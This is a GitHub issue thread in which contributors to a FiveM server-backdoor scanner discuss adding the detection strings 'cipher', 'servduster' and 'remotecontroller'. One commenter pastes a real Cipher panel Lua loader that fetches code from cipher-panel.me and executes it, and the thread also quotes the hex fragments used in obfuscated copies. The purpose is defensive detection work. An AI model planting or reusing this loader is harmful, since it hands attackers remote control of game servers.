Blumlaut
commented
2 years ago Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Closed Blitoka33 closed 2 years ago
Blumlaut
commented
2 years ago Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Blitoka33
commented
2 years ago Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Cipher installs cipher-panel.me performhttprequest into scripts, so it does, servduster is a private one (most likely a cipher copy, from what I saw), I saw in some servers (this is not their real name, just a random domain), remotecontroller is a casual suspicious string, it's a string for some runcode exploits.
Blumlaut
commented
2 years ago the examples of cipher panel payloads i saw were all hexadecimal, that's what the "'68', '74', '74', '70', '73', '3a'" actually is.
Do you have a sample of these payloads?
Blitoka33
commented
2 years ago Yes I can.
PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)qJDxOx is the userid as far as I know.
I saw it in servers having issues with cipher.
Blumlaut
commented
2 years ago Odd, all cases i saw of it used obfuscated code, i'll merge it anyhow
I just added 3 infected strings, to detect more stuff. "cipher", "servduster", "remotecontroller"